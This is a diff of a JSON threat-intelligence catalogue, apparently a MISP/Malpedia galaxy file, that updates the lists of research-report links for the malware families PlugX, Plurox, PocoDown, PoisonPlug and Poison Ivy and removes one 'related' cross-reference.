- "https://www.youtube.com/watch?v=qEwBGGgWgOM",
- "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://blog.xorhex.com/blog/reddeltaplugxchangeup/",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://www.secureworks.com/research/bronze-president-targets-ngos",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited",
- "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
- "https://www.recordedfuture.com/china-linked-ta428-threat-group",
- "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
- "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
- "https://blog.xorhex.com/blog/mustangpandaplugx-2/",
- "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
- "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html",
+ "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/",
"https://risky.biz/whatiswinnti/",
- "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/",
- "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx",
- "https://www.macnica.net/file/security_report_20160613.pdf",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf",
+ "https://blog.xorhex.com/blog/mustangpandaplugx-1/",
+ "https://www.youtube.com/watch?v=E2_DTQJjDYc",
"https://securelist.com/cycldek-bridging-the-air-gap/97157/",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
"https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
- "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader",
- "https://www.secureworks.com/blog/bronze-president-targets-government-officials",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
"https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
- "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html",
- "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
- "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
- "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
- "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://www.youtube.com/watch?v=C_TmANnbS2k",
+ "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
+ "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
"https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
- "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/",
- "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
- "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
- "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://attack.mitre.org/groups/G0001/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/",
+ "https://engineers.ffri.jp/entry/2022/11/30/141346",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
+ "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
+ "https://blog.xorhex.com/blog/reddeltaplugxchangeup/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.macnica.net/file/security_report_20160613.pdf",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/",
+ "https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf",
+ "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html",
+ "https://www.contextis.com/en/blog/avivore",
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf",
+ "https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
+ "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/",
"https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution",
+ "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
"https://www.youtube.com/watch?v=IRh6R8o1Q7U",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/",
+ "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
+ "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf",
+ "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/",
"https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
- "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf",
+ "https://securelist.com/time-of-death-connected-medicine/84315/",
+ "https://tracker.h3x.eu/info/290",
+ "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
+ "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/",
+ "https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/",
+ "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
+ "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
+ "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
+ "https://www.youtube.com/watch?v=C_TmANnbS2k",
+ "https://www.secureworks.com/research/bronze-president-targets-ngos",
+ "https://community.rsa.com/thread/185439",
+ "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/",
+ "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf",
+ "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-olive",
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.contextis.com/en/blog/dll-search-order-hijacking",
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://unit42.paloaltonetworks.com/unsigned-dlls/",
+ "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/",
+ "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx",
+ "https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/",
+ "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
+ "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
+ "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/",
+ "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html",
+ "https://blog.xorhex.com/blog/mustangpandaplugx-2/",
+ "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
+ "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
+ "https://unit42.paloaltonetworks.com/thor-plugx-variant/",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
+ "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
+ "https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
+ "https://www.recordedfuture.com/china-linked-ta428-threat-group",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
+ "https://www.youtube.com/watch?v=qEwBGGgWgOM",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
+ "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "https://twitter.com/xorhex/status/1399906601562165249?s=20",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader",
+ "https://twitter.com/stvemillertime/status/1261263000960450562",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html",
+ "https://www.youtube.com/watch?v=r1zAVX_HnJg",
+ "https://www.secureworks.com/blog/bronze-president-targets-government-officials",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets",
+ "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president"
],
"synonyms": [
"Destroy RAT",
@@ -36125,15 +38051,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f4b159ea-97e5-483b-854b-c48a78d562aa",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee",
"value": "PlugX"
},
@@ -36142,8 +38059,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox",
- "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html",
- "https://securelist.com/plurox-modular-backdoor/91213/"
+ "https://securelist.com/plurox-modular-backdoor/91213/",
+ "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html"
],
"synonyms": [],
"type": []
@@ -36183,9 +38100,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown",
+ "https://twitter.com/cyb3rops/status/1129653190444703744",
"https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html",
- "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html",
- "https://twitter.com/cyb3rops/status/1129653190444703744"
+ "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html"
],
"synonyms": [
"Blitz",
@@ -36201,12 +38118,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug",
+ "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
- "https://content.fireeye.com/apt-41/rpt-apt41/"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/"
],
"synonyms": [
"Barlaiy"
@@ -36221,53 +38138,54 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy",
- "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
- "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
- "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
"https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
- "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://attack.mitre.org/groups/G0011",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
"https://vblocalhost.com/uploads/VB2020-20.pdf",
- "http://blogs.360.cn/post/APT_C_01_en.html",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
+ "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
+ "https://attack.mitre.org/groups/G0011",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
+ "https://engineers.ffri.jp/entry/2022/11/30/141346",
+ "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/",
+ "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://community.riskiq.com/article/56fa1b2f",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "http://blogs.360.cn/post/APT_C_01_en.html",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
+ "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf",
"https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
"https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
"https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii",
"https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
"https://unit42.paloaltonetworks.com/atoms/crawling-taurus/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://community.riskiq.com/article/56fa1b2f",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
"https://www.recordedfuture.com/china-linked-ta428-threat-group",
- "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
- "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
- "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
],
"synonyms": [
"SPIVY",
